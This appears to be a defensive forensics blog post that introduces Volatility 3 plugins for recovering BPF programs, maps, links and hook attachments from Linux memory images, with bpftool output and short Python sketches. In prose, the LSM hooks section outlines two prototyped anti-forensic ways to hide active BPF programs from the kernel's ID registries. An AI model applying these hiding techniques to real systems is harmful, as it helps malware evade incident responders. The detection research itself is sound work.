<p>The <code class="language-plaintext highlighter-rouge">bpftool</code> user-space utility allows admins to interact with the BPF subsystem. One of the most basic tasks it supports is the listing of all loaded BPF programs, maps, BTF sections, or links. We are sometimes going to refer to these things collectively as <strong>BPF objects</strong>. Roughly speaking, links are a mechanism to connect a loaded program to a point where it is being invoked, and BTF is a condensed form of DWARF debug information.</p>

<p>Let’s start with an example to get familiar with the information that is displayed (run <code class="language-plaintext highlighter-rouge">bpftool</code> as <code class="language-plaintext highlighter-rouge">root</code>):</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>bpftool prog list
<span class="go">[...]
22: lsm  name restrict_filesystems  tag 713a545fe0530ce7  gpl
	loaded_at 2023-11-26T10:31:42+0100  uid 0
	xlated 560B  jited 305B  memlock 4096B  map_ids 13
	btf_id 53
[...]
</span></code></pre></div></div>
<p>From left-to-right and top-to-bottom we have: the ID used as an identifier for user space, the program type, program name, tag that is a SHA1 hash over the bytecode, license, program load timestamp, UID of the process that loaded it, size of the bytecode, size of the jited code, memory locked by the program, IDs of the maps that the program is using, and the ID of the BTF information for the program.</p>
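<p>As an aside, the tag can be recomputed from a bytecode dump. The kernel derives it in <code class="language-plaintext highlighter-rouge">bpf_prog_calc_tag</code> roughly as the first 8 bytes of a SHA-1 digest over the raw instruction words; the sketch below omits details such as the zeroing of map-fd immediates before hashing, so treat it as an illustration rather than an exact re-implementation:</p>

```python
import hashlib

def bpf_prog_tag(insns: bytes) -> str:
    # Simplified sketch of the kernel's bpf_prog_calc_tag(): SHA-1 over the
    # raw instruction bytes, truncated to 8 bytes (16 hex characters).
    # The kernel additionally zeroes map-fd immediates before hashing, which
    # we skip here, so this only matches programs without map references.
    return hashlib.sha1(insns).hexdigest()[:16]

# Example: tag over two 8-byte instructions ('r0 = 0; exit').
tag = bpf_prog_tag(b"\xb7\x00\x00\x00\x00\x00\x00\x00"
                   b"\x95\x00\x00\x00\x00\x00\x00\x00")
```

A matching tag is a quick sanity check that a dumped program has not been modified between two acquisitions.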

<p>We can also inspect the bytecode</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>bpftool prog dump xlated <span class="nb">id </span>22
<span class="go">int restrict_filesystems(unsigned long long * ctx):
</span><span class="gp">;</span><span class="w"> </span>int BPF_PROG<span class="o">(</span>restrict_filesystems, struct file <span class="k">*</span>file, int ret<span class="o">)</span>
<span class="go">   0: (79) r3 = *(u64 *)(r1 +0)
   1: (79) r0 = *(u64 *)(r1 +8)
   2: (b7) r1 = 0
[...]
</span></code></pre></div></div>
<p>where each line is the pseudocode of a BPF assembly instruction and we even have line info, which is also stored in the attached BTF information. We can also dump the jited version and confirm that it is essentially a one-to-one translation to x86_64 machine code (depending on the architecture your kernel runs on):</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>bpftool prog dump jited <span class="nb">id </span>22
<span class="go">int restrict_filesystems(unsigned long long * ctx):
bpf_prog_713a545fe0530ce7_restrict_filesystems:
</span><span class="gp">;</span><span class="w"> </span>int BPF_PROG<span class="o">(</span>restrict_filesystems, struct file <span class="k">*</span>file, int ret<span class="o">)</span>
<span class="go">   0:	endbr64
   4:	nopl	(%rax,%rax)
   9:	nop
   b:	pushq	%rbp
   c:	movq	%rsp, %rbp
   f:	endbr64
</span><span class="gp">  13:	subq	$</span>24, %rsp
<span class="go">  1a:	pushq	%rbx
  1b:	pushq	%r13
  1d:	movq	(%rdi), %rdx
  21:	movq	8(%rdi), %rax
  25:	xorl	%edi, %edi
[...]
</span></code></pre></div></div>
<p>Furthermore, we can display basic information about the maps used by the program</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>bpftool map list <span class="nb">id </span>13
<span class="go">13: hash_of_maps  name cgroup_hash  flags 0x0
	key 8B  value 4B  max_entries 2048  memlock 165920B
</span></code></pre></div></div>
<p>as well as their contents (which are quite boring in this case).</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>bpftool map dump <span class="nb">id </span>13
<span class="go">Found 0 elements
</span></code></pre></div></div>
<p>We can also get information about the variables and types (BTF) defined in the program. This is somewhat comparable to the DWARF debug information that comes with some binaries - just that it is harder to strip since it is needed by the BPF VM.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>bpftool btf dump <span class="nb">id </span>53
<span class="go">[1] PTR '(anon)' type_id=3
[2] INT 'int' size=4 bits_offset=0 nr_bits=32 encoding=SIGNED
[3] ARRAY '(anon)' type_id=2 index_type_id=4 nr_elems=13
[4] INT '__ARRAY_SIZE_TYPE__' size=4 bits_offset=0 nr_bits=32 encoding=(none)
[5] PTR '(anon)' type_id=6
[6] TYPEDEF 'uint64_t' type_id=7
[7] TYPEDEF '__uint64_t' type_id=8
[8] INT 'unsigned long' size=8 bits_offset=0 nr_bits=64 encoding=(none)
[9] PTR '(anon)' type_id=10
[10] TYPEDEF 'uint32_t' type_id=11
[11] TYPEDEF '__uint32_t' type_id=12
[12] INT 'unsigned int' size=4 bits_offset=0 nr_bits=32 encoding=(none)
[13] STRUCT '(anon)' size=24 vlen=3
	'type' type_id=1 bits_offset=0
	'key' type_id=5 bits_offset=64
	'value' type_id=9 bits_offset=128
[...]
</span></code></pre></div></div>
<p>As we said earlier, links are what connects a loaded program to a point that invokes it.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>bpftool <span class="nb">link </span>list
<span class="go">[...]
3: tracing  prog 22
	prog_type lsm  attach_type lsm_mac
	target_obj_id 1  target_btf_id 82856
</span></code></pre></div></div>
<p>Again, from left-to-right and top-to-bottom we have: the link ID, link type, attached program’s ID, the program’s type, the attach type that was used, the ID of the BTF object that the following field refers to, and the ID of the type that the program is attached to (functions can also have BTF entries). Note that everything but the first line depends on the type of link that is examined. To find the point where the program is called by the kernel we can inspect the relevant BTF object (the kernel’s in this case).</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>bpftool btf dump <span class="nb">id </span>1 | rg 82856
<span class="go">[82856] FUNC 'bpf_lsm_file_open' type_id=16712 linkage=static
</span></code></pre></div></div>
<p>Thus we can conclude that the program is invoked early in the <code class="language-plaintext highlighter-rouge">do_dentry_open</code> function via the <code class="language-plaintext highlighter-rouge">security_file_open</code> LSM hook and that its return value decides whether the process will be allowed to open the file (we’re skipping some steps here, see our <a href="https://blog.eb9f.de/2023/04/24/lsm2bpf.html">earlier article</a> for the full story).</p>

<p>We performed this little “live investigation” on a laptop running Arch Linux with kernel 6.6.2-arch1-1 and the program wasn’t malware but rather loaded by systemd on boot. You can find the commit that introduced the feature <a href="https://github.com/systemd/systemd/commit/021d1e96123289182565f0b3ce5a705b0e84fe48">here</a>. Again, you can see that in the future there will be more legitimate BPF programs running on your systems (servers, desktops and mobiles) than you might think!</p>

<h4 id="memory-image">Memory Image</h4>

<p>As a first step towards BPF memory forensics it would be nice to be able to perform the above investigation on a memory image. We will now introduce three plugins that aim to make this possible.</p>

<p>We already saw that all sorts of BPF objects are identified by an ID. Internally, these IDs are allocated using the <a href="https://www.kernel.org/doc/html/latest/core-api/idr.html?highlight=idr">IDR mechanism</a>, a core kernel API. For that purpose, three IDRs (and their protecting spinlocks) are defined at the top of <code class="language-plaintext highlighter-rouge">kernel/bpf/syscall.c</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">[...]</span>
<span class="k">static</span> <span class="nf">DEFINE_IDR</span><span class="p">(</span><span class="n">prog_idr</span><span class="p">);</span>
<span class="k">static</span> <span class="nf">DEFINE_SPINLOCK</span><span class="p">(</span><span class="n">prog_idr_lock</span><span class="p">);</span>
<span class="k">static</span> <span class="nf">DEFINE_IDR</span><span class="p">(</span><span class="n">map_idr</span><span class="p">);</span>
<span class="k">static</span> <span class="nf">DEFINE_SPINLOCK</span><span class="p">(</span><span class="n">map_idr_lock</span><span class="p">);</span>
<span class="k">static</span> <span class="nf">DEFINE_IDR</span><span class="p">(</span><span class="n">link_idr</span><span class="p">);</span>
<span class="k">static</span> <span class="nf">DEFINE_SPINLOCK</span><span class="p">(</span><span class="n">link_idr_lock</span><span class="p">);</span>
<span class="p">[...]</span>
</code></pre></div></div>
<p>Under the hood, the ID allocation mechanism uses an <a href="https://www.kernel.org/doc/html/latest/core-api/xarray.html?highlight=xarray">extensible array (xarray)</a>, a tree-like data structure that is rooted in the <code class="language-plaintext highlighter-rouge">idr_rt</code> member of the structure that is defined by the macro. The ID of a new object is simply an unused index into the array, and the value stored at this index is a pointer to a structure that describes it. Thus, we can re-create the listing capabilities of <code class="language-plaintext highlighter-rouge">bpftool</code> by simply iterating the array. You can find the code that does so in the <a href="https://github.com/vobst/BPFVol3/blob/main/src/utility/datastructures.py#L17">XArray</a> class.</p>
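<p>To illustrate the idea, here is a simplified, self-contained sketch of such a walk. The real <code class="language-plaintext highlighter-rouge">XArray</code> class handles many more details (multi-order entries, reading node structures through Volatility’s translation layer, varying shifts); the <code class="language-plaintext highlighter-rouge">read_slots</code> callback and the index computation below are illustrative assumptions:</p>

```python
XA_CHUNK_SHIFT = 6  # 64 slots per node on typical configurations

def xa_is_internal(entry: int) -> bool:
    # Entries with low bits 0b10 are tagged pointers to internal nodes.
    return (entry & 3) == 2

def xarray_iter(read_slots, entry: int, index: int = 0):
    """Yield (id, pointer) pairs stored below `entry`, depth-first.

    `read_slots(node_addr)` abstracts reading a node's slot array; in a
    plugin it would go through the memory image, here it can be backed by
    a plain dict for demonstration purposes.
    """
    if xa_is_internal(entry):
        node_addr = entry - 2  # strip the internal tag to get the address
        for slot, child in enumerate(read_slots(node_addr)):
            if child:
                yield from xarray_iter(
                    read_slots, child, (index << XA_CHUNK_SHIFT) | slot
                )
    else:
        yield index, entry

# Demo: a single-level tree where IDs 1 and 3 are in use.
fake_memory = {0x1000: [0, 0xFFFF0010, 0, 0xFFFF0020]}
ids = list(xarray_iter(lambda addr: fake_memory[addr], 0x1000 | 2))
```

For an IDR the yielded index is the object's ID and the entry is the kernel virtual address of the describing structure.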

<p>Dereferencing the array entries leads us to structures that hold most of the information displayed by <code class="language-plaintext highlighter-rouge">bpftool</code> earlier.</p>

<p>Entries of the <a href="https://elixir.bootlin.com/linux/v6.1.63/source/kernel/bpf/syscall.c#L50"><code class="language-plaintext highlighter-rouge">prog_idr</code></a> point to objects of type <a href="https://elixir.bootlin.com/linux/v6.1.63/source/include/linux/bpf.h#L1217"><code class="language-plaintext highlighter-rouge">bpf_prog</code></a>; the <code class="language-plaintext highlighter-rouge">aux</code> member of this type points to a <a href="https://elixir.bootlin.com/linux/v6.1.63/source/include/linux/bpf.h#L1129">structure</a> that holds additional information about the program. We can see how the information <code class="language-plaintext highlighter-rouge">bpftool</code> displays is generated from these structures in the <a href="https://elixir.bootlin.com/linux/v6.1.63/source/kernel/bpf/syscall.c#L3896"><code class="language-plaintext highlighter-rouge">bpf_prog_get_info_by_fd</code></a> function by filling a <a href="https://elixir.bootlin.com/linux/v6.1.63/source/include/uapi/linux/bpf.h#L6172"><code class="language-plaintext highlighter-rouge">bpf_prog_info</code></a> struct. The plugin <a href="https://github.com/vobst/BPFVol3/blob/main/src/plugins/bpf_listprogs.py"><code class="language-plaintext highlighter-rouge">bpf_listprogs</code></a> re-implements some of the logic of this function and displays the following pieces of information.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">columns</span><span class="p">:</span> <span class="nb">list</span><span class="p">[</span><span class="nb">tuple</span><span class="p">[</span><span class="nb">str</span><span class="p">,</span> <span class="nb">type</span><span class="p">]]</span> <span class="o">=</span> <span class="p">[</span>
    <span class="p">(</span><span class="s">"OFFSET (V)"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"ID"</span><span class="p">,</span> <span class="nb">int</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"TYPE"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"NAME"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"TAG"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"LOADED AT"</span><span class="p">,</span> <span class="nb">int</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"MAP IDs"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"BTF ID"</span><span class="p">,</span> <span class="nb">int</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"HELPERS"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
<span class="p">]</span>
</code></pre></div></div>
<p>Some comments are in order:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">OFFSET (V)</code> are the low 6 bytes of the <code class="language-plaintext highlighter-rouge">bpf_prog</code> structure’s virtual address. This is useful as a unique identifier of the structure.</li>
  <li><code class="language-plaintext highlighter-rouge">LOADED AT</code> is the number of nanoseconds since boot when the program was loaded. Converting it to an absolute timestamp requires parsing additional kernel time-keeping structures and is not in scope for this plugin. There exist Volatility patches that add this functionality but they are not upstream yet. Once they are, it should be trivial to convert this field to match the <code class="language-plaintext highlighter-rouge">bpftool</code> output.</li>
  <li><code class="language-plaintext highlighter-rouge">HELPERS</code> is a field that is not reported by <code class="language-plaintext highlighter-rouge">bpftool</code>. It displays a list of all the kernel functions that are called by the BPF program, i.e., BPF helpers and kfuncs, and is helpful to quickly identify programs that use possibly malicious or non-standard helpers.</li>
  <li>The reporting of memory utilization is omitted as we consider it to be less important for forensic investigations, however, it would be easy to add.</li>
</ul>

<p>The second <code class="language-plaintext highlighter-rouge">bpftool</code> functionality the plugin supports is the dumping of programs in bytecode and jited forms. To dump the machine code of the program, we follow the <code class="language-plaintext highlighter-rouge">bpf_func</code> pointer in the <code class="language-plaintext highlighter-rouge">bpf_prog</code> structure, which points to the entrypoint of the jited BPF program. The length of the machine code is stored in the <code class="language-plaintext highlighter-rouge">jited_len</code> field of the same structure. While we support dumping the raw bytes to a file, their analysis is tedious due to missing symbol information. Thus, we also support disassembling the program and annotating all occurring addresses with the corresponding symbol, which makes the programs much easier to analyze.</p>
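<p>The symbol annotation itself boils down to a nearest-symbol lookup over a sorted address table, as one would do when post-processing a disassembly listing. A minimal sketch (the function name and table contents are illustrative, not the plugin’s API):</p>

```python
import bisect

def resolve(symtab, addr):
    """Resolve `addr` against a sorted list of (address, name) pairs,
    returning 'name' or 'name+0x<offset>' like a disassembly annotation."""
    addrs = [a for a, _ in symtab]
    i = bisect.bisect_right(addrs, addr) - 1
    if i < 0:
        return hex(addr)  # below the first known symbol, leave it raw
    base, name = symtab[i]
    off = addr - base
    return name if off == 0 else f"{name}+{off:#x}"

# Demo with a tiny, made-up symbol table.
symtab = [(0xFFFF1000, "bpf_get_current_pid_tgid"),
          (0xFFFF2000, "bpf_probe_read_kernel")]
```

Annotating call targets this way makes jited dumps readable, since helper calls otherwise show up as bare kernel addresses.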

<p>Dumping the BPF bytecode is straightforward as well. The flexible <code class="language-plaintext highlighter-rouge">insnsi</code> array member of the <code class="language-plaintext highlighter-rouge">bpf_prog</code> structure holds the bytecode instructions and the <code class="language-plaintext highlighter-rouge">len</code> field holds their number. Here, we also support dumping the raw and disassembled bytecode. However, the additional symbol annotations are not implemented. As the bytecode is not “what actually runs”, we consider this information more susceptible to anti-forensic tampering and thus focused on the machine code, which is what is executed when invoking the program.</p>
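<p>For reference, each entry of that array is one fixed-size 8-byte instruction: an opcode byte, one byte packing the destination register (low nibble, on little-endian hosts) and source register (high nibble), a signed 16-bit offset, and a signed 32-bit immediate. A small sketch of decoding a single instruction:</p>

```python
import struct

def decode_insn(raw: bytes) -> dict:
    # Layout of struct bpf_insn on a little-endian host: opcode (u8),
    # dst_reg/src_reg packed into one byte, s16 offset, s32 immediate.
    opcode, regs, off, imm = struct.unpack("<BBhi", raw)
    return {"opcode": opcode, "dst": regs & 0xF, "src": regs >> 4,
            "off": off, "imm": imm}

# Demo: 'r1 = 5' (BPF_ALU64 | BPF_MOV | BPF_K, opcode 0xb7).
insn = decode_insn(b"\xb7\x01\x00\x00\x05\x00\x00\x00")
```

This is essentially what any BPF disassembler does before pretty-printing the pseudocode shown by <code class="language-plaintext highlighter-rouge">bpftool</code>.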

<p><em>Note: We use <a href="https://github.com/capstone-engine/capstone">Capstone</a> for disassembling the BPF bytecode. Unfortunately, Capstone’s BPF architecture is outdated and thus bytecode is sometimes not disassembled entirely. As a workaround, you can dump the raw bytes and use another tool to disassemble them.</em></p>

<p>Entries of the <a href="https://elixir.bootlin.com/linux/v6.1.63/source/kernel/bpf/syscall.c#L52"><code class="language-plaintext highlighter-rouge">map_idr</code></a> point to <a href="https://elixir.bootlin.com/linux/v6.1.63/source/include/linux/bpf.h#L202"><code class="language-plaintext highlighter-rouge">bpf_map</code></a> objects. The <a href="https://elixir.bootlin.com/linux/v6.1.63/source/include/uapi/linux/bpf.h#L6214"><code class="language-plaintext highlighter-rouge">bpf_map_info</code></a> structure parsed by <code class="language-plaintext highlighter-rouge">bpftool</code> is filled in <a href="https://elixir.bootlin.com/linux/v6.1.63/source/kernel/bpf/syscall.c#L4185"><code class="language-plaintext highlighter-rouge">bpf_map_get_info_by_fd</code></a> and the plugin <a href="https://github.com/vobst/BPFVol3/blob/main/src/plugins/bpf_listmaps.py"><code class="language-plaintext highlighter-rouge">bpf_listmaps</code></a> simply copies this logic to display the following pieces of information.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">columns</span><span class="p">:</span> <span class="nb">list</span><span class="p">[</span><span class="nb">tuple</span><span class="p">[</span><span class="nb">str</span><span class="p">,</span> <span class="n">Any</span><span class="p">]]</span> <span class="o">=</span> <span class="p">[</span>
        <span class="p">(</span><span class="s">"OFFSET (V)"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
        <span class="p">(</span><span class="s">"ID"</span><span class="p">,</span> <span class="nb">int</span><span class="p">),</span>
        <span class="p">(</span><span class="s">"TYPE"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
        <span class="p">(</span><span class="s">"NAME"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
        <span class="p">(</span><span class="s">"KEY SIZE"</span><span class="p">,</span> <span class="nb">int</span><span class="p">),</span>
        <span class="p">(</span><span class="s">"VALUE SIZE"</span><span class="p">,</span> <span class="nb">int</span><span class="p">),</span>
        <span class="p">(</span><span class="s">"MAX ENTRIES"</span><span class="p">,</span> <span class="nb">int</span><span class="p">),</span>
<span class="p">]</span>
</code></pre></div></div>
<p>Dumping the contents of maps is hard due to the diversity in map types. Each map type requires its own handling, beginning with manually downcasting the <code class="language-plaintext highlighter-rouge">bpf_map</code> object to the correct container type. One approach to avoid implementing each lookup mechanism separately would be to emulate the <a href="https://elixir.bootlin.com/linux/v6.1.63/source/include/linux/bpf.h#L78"><code class="language-plaintext highlighter-rouge">map_get_next_key</code></a> and <a href="https://elixir.bootlin.com/linux/v6.1.63/source/kernel/bpf/syscall.c#L235"><code class="language-plaintext highlighter-rouge">bpf_map_copy_value</code></a> kernel functions, where the former is a function pointer found in the map’s operations structure. However, this is not in scope for the current plugin.</p>

<p>Furthermore, the dumping could be enhanced by utilizing the BTF information that is optionally attached to the map to properly display keys and values, similar to the <a href="https://elixir.bootlin.com/linux/v6.1.63/source/kernel/trace/bpf_trace.c#L1015"><code class="language-plaintext highlighter-rouge">bpf_snprintf_btf</code></a> helper that can be used to pretty-print objects using their BTF information.</p>

<p>We implemented the dumping for the most straightforward map type - arrays - but the plugin does not support dumping other types of maps.</p>
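<p>The array case is simple because the values live in one flat buffer directly after the map header, with each element padded to a multiple of 8 bytes. A sketch of the offset computation (the <code class="language-plaintext highlighter-rouge">read</code> callback stands in for a read through the memory image and is an illustrative assumption):</p>

```python
def dump_array_map(read, values_addr, value_size, max_entries):
    # Each element occupies value_size rounded up to 8 bytes, mirroring the
    # layout of the value buffer in the kernel's bpf_array structure.
    elem_size = (value_size + 7) & ~7
    return [read(values_addr + i * elem_size, value_size)
            for i in range(max_entries)]

# Demo with a fake reader that records the (address, length) requests.
reads = dump_array_map(lambda addr, n: (addr, n), 0x1000, 4, 3)
```

Other map types, notably hash maps, need per-type bucket walking and are why generic dumping is hard.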

<p>Entries of the <a href="https://elixir.bootlin.com/linux/v6.1.63/source/kernel/bpf/syscall.c#L54"><code class="language-plaintext highlighter-rouge">link_idr</code></a> point to objects of type <a href="https://elixir.bootlin.com/linux/v6.1.63/source/include/linux/bpf.h#L1259"><code class="language-plaintext highlighter-rouge">bpf_link</code></a>. Again, there is an informational structure, <a href="https://elixir.bootlin.com/linux/v6.1.63/source/include/uapi/linux/bpf.h#L6242"><code class="language-plaintext highlighter-rouge">bpf_link_info</code></a>, which is this time filled in the <a href="https://elixir.bootlin.com/linux/v6.1.63/source/kernel/bpf/syscall.c#L4246"><code class="language-plaintext highlighter-rouge">bpf_link_get_info_by_fd</code></a> function. By analyzing this function, we wrote the <a href="https://github.com/vobst/BPFVol3/blob/main/src/plugins/bpf_listlinks.py"><code class="language-plaintext highlighter-rouge">bpf_listlinks</code></a> plugin that retrieves the following pieces of information.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">columns</span><span class="p">:</span> <span class="nb">list</span><span class="p">[</span><span class="nb">tuple</span><span class="p">[</span><span class="nb">str</span><span class="p">,</span> <span class="n">Any</span><span class="p">]]</span> <span class="o">=</span> <span class="p">[</span>
    <span class="p">(</span><span class="s">"OFFSET (V)"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"ID"</span><span class="p">,</span> <span class="nb">int</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"TYPE"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"PROG"</span><span class="p">,</span> <span class="nb">int</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"ATTACH"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
<span class="p">]</span>
</code></pre></div></div>
<p>Here, the last column is obtained by mimicking the virtual call to <code class="language-plaintext highlighter-rouge">link-&gt;ops-&gt;fill_link_info</code> that adds link-type specific information about the associated attachment point, e.g., for tracing links it adds the BTF object and type IDs we saw earlier.</p>

<h3 id="lsm-hooks">LSM Hooks</h3>

<p>Our three listing plugins have one conceptual weakness in common: they rely entirely on information obtained by parsing the <code class="language-plaintext highlighter-rouge">(prog|map|link)_idr</code>s. However, the entire ID mechanism lives in the user-facing part of the BPF subsystem; it is simply a means for user space to refer to BPF objects in syscalls. Thus, our plugins are susceptible to trivial anti-forensic tampering.</p>

<p>In our research, we prototyped two anti-forensic methods that remove BPF objects from these structures while still keeping the corresponding program active in the kernel. The first and more straightforward one is to write a kernel module that uses standard APIs to remove IDs from the IDRs. The second one is based on the observation that the lifecycle of BPF objects is managed via reference counts. Thus, if we artificially increment the reference count of an object that (indirectly) holds references to all other objects that are required to operate a BPF program, e.g., a link, we can prevent the program’s destruction when all “regular” references are dropped.</p>

<p>One approach to counter these anti-forensic measures is to “approach from the other side”. Instead of relying on information from sources that are far detached from the actual program execution, we go to the very places and mechanisms that invoke the program. The downside is obviously that this low-level code is much more program-type- and architecture-specific; the results, on the other hand, are more robust.</p>

<p>In a <a href="https://blog.eb9f.de/2023/04/24/lsm2bpf.html">previous blog post</a> we described the low-level details that lead up to the execution of BPF LSM programs in great detail. Based on this knowledge, we developed the <a href="https://github.com/vobst/BPFVol3/blob/main/src/plugins/bpf_lsm.py"><code class="language-plaintext highlighter-rouge">bpf_lsm</code></a> plugin that can discover hidden BPF programs attached to security hooks. In short, the plugin checks the places where the kernel control flow may be diverted into the BPF VM for the presence of inline hooks. If they are found, it cross-checks with the link IDR to see if there is a corresponding link, the absence of which is a strong indication of tampering. Additionally, the plugin is also valuable in the absence of tampering, as it shows you the exact program attachment point without the need to manually resolve BTF IDs. In particular, the plugin displays the number of attached programs and their IDs along with the name of the LSM hook where they are attached.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">columns</span><span class="p">:</span> <span class="nb">list</span><span class="p">[</span><span class="nb">tuple</span><span class="p">[</span><span class="nb">str</span><span class="p">,</span> <span class="nb">type</span><span class="p">]]</span> <span class="o">=</span> <span class="p">[</span>
    <span class="p">(</span><span class="s">"LSM HOOK"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"Nr. PROGS"</span><span class="p">,</span> <span class="nb">int</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"IDs"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
<span class="p">]</span>
</code></pre></div></div>
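<p><em>The cross-check at the core of this tamper detection can be sketched in a few lines. This is an illustrative sketch, not the plugin's actual code; the function name and inputs are ours:</em></p>

```python
# Illustrative sketch (not the plugin's API): programs found by scanning
# for inline hooks that have no corresponding entry in the links IDR are
# a strong indication of tampering.
def find_hidden_lsm_progs(hooked_prog_ids, linked_prog_ids):
    """Return IDs of hooked programs without a corresponding BPF link."""
    return sorted(set(hooked_prog_ids) - set(linked_prog_ids))
```

<p><em>An empty result means that every program found at a hook site is accounted for by a link in the IDR.</em></p>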

<h3 id="networking-hooks">Networking Hooks</h3>

<p>As we described above, traffic control (tc) programs are especially useful for exfiltrating information from infected machines, e.g., by hijacking existing TCP connections. Thus, the second plugin that obtains its information from more tamper resistant sources targets tc BPF programs. It only relies on the <a href="https://elixir.bootlin.com/linux/v6.1.65/source/include/net/sch_generic.h#L1265"><code class="language-plaintext highlighter-rouge">mini_Qdisc</code></a> structure that is used on the transmission and receive fast paths to look up queuing disciplines (qdisc) attached to a network device.</p>

<p>We use the <a href="https://github.com/volatilityfoundation/community3/blob/master/Sheffer_Shaked_Docker/plugins/ifconfig.py"><code class="language-plaintext highlighter-rouge">ifconfig plugin</code></a> by Ofek Shaked and Amir Sheffer to obtain a list of all network devices. Then, we find the above-mentioned structure and use it to collect all BPF programs that are involved in qdiscs on this device. With kernel 6.3, the process of locating the <code class="language-plaintext highlighter-rouge">mini_Qdisc</code> from the network interface changed slightly due to the introduction of link-based attachment of tc programs; however, the plugin recognizes and handles both cases. Finally, the <a href="https://github.com/vobst/BPFVol3/blob/main/src/plugins/bpf_netdev.py"><code class="language-plaintext highlighter-rouge">bpf_netdev</code></a> plugin displays the following information about each interface where at least one BPF program was found,</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">columns</span><span class="p">:</span> <span class="nb">list</span><span class="p">[</span><span class="nb">tuple</span><span class="p">[</span><span class="nb">str</span><span class="p">,</span> <span class="nb">type</span><span class="p">]]</span> <span class="o">=</span> <span class="p">[</span>
    <span class="p">(</span><span class="s">"NAME"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"MAC ADDR"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"EGRESS"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"INGRESS"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
<span class="p">]</span>
</code></pre></div></div>
<p>where the <code class="language-plaintext highlighter-rouge">EGRESS</code> and <code class="language-plaintext highlighter-rouge">INGRESS</code> columns hold the IDs of the programs that process packets flowing in the respective direction.</p>

<h3 id="finding-processes">Finding Processes</h3>

<p>Yet another way to discover BPF objects is through the processes that hold on to them. As with many other resources, programs, links, maps, and BTF objects are represented to processes as file descriptors. These descriptors can be used to act on the object and retrieve information about it, and they serve as a mechanism to clean up after processes that did not exit gracefully. Furthermore, an investigator might want to find out which process holds on to a specific BPF object in order to investigate that process further.</p>

<p>Thus, the <a href="https://github.com/vobst/BPFVol3/blob/main/src/plugins/bpf_listprocs.py"><code class="language-plaintext highlighter-rouge">bpf_listprocs</code></a> plugin displays the following pieces of information for every process that holds on to at least one BPF object via a file descriptor.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">columns</span><span class="p">:</span> <span class="nb">list</span><span class="p">[</span><span class="nb">tuple</span><span class="p">[</span><span class="nb">str</span><span class="p">,</span> <span class="nb">type</span><span class="p">]]</span> <span class="o">=</span> <span class="p">[</span>
    <span class="p">(</span><span class="s">"PID"</span><span class="p">,</span> <span class="nb">int</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"COMM"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"PROGS"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"MAPS"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"LINKS"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
<span class="p">]</span>
</code></pre></div></div>
